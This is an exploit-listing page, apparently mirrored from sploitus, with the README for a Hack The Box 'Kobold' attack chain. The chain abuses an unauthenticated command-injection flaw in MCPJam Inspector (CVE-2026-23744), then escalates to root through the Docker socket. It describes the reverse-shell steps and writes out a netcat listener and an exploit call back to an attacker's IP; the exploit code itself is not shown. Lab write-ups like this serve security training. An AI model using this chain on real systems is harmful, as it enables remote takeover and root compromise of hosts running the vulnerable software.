Share
## https://sploitus.com/exploit?id=34D3FF5F-F69D-5CC5-B1E4-A0DE6DB0B59A
# CVE-2026-23744 - Kobold Exploit
Full chain exploit for the Kobold HTB machine. Exploits MCPJam Inspector RCE (CVE-2026-23744) and escalates to root via Docker socket abuse.
## CVE-2026-23744
MCPJam Inspector <= 1.4.2 listens on `0.0.0.0` by default. The `/api/mcp/connect` endpoint passes `command` and `args` directly to shell execution without sanitization, allowing unauthenticated RCE.
## What the exploit does
1. Sends a crafted POST to `/api/mcp/connect` with a reverse shell payload
2. Uses `sg docker` to switch to the docker group (no password in gshadow)
3. Runs a privileged container mounting the host filesystem
4. Chroots into the host and sends a root reverse shell
## Usage
```bash
# Terminal 1 - listener
nc -lvnp 4444
# Terminal 2 - exploit
python3 exploit.py mcp.kobold.htb --lhost YOUR_IP --lport 4444
```
## Options
| Flag | Description | Default |
|------|-------------|---------|
| `target` | Target host | required |
| `--lhost` | Your IP | required |
| `--lport` | Your port | required |
| `-p` | Target port | 443 |
| `-s` | Scheme (http/https) | https |
| `-e` | Endpoint path | /api/mcp/connect |
| `-t` | Timeout | 10 |
| `-v` | Verbose output | off |
## Requirements
```
pip install requests
```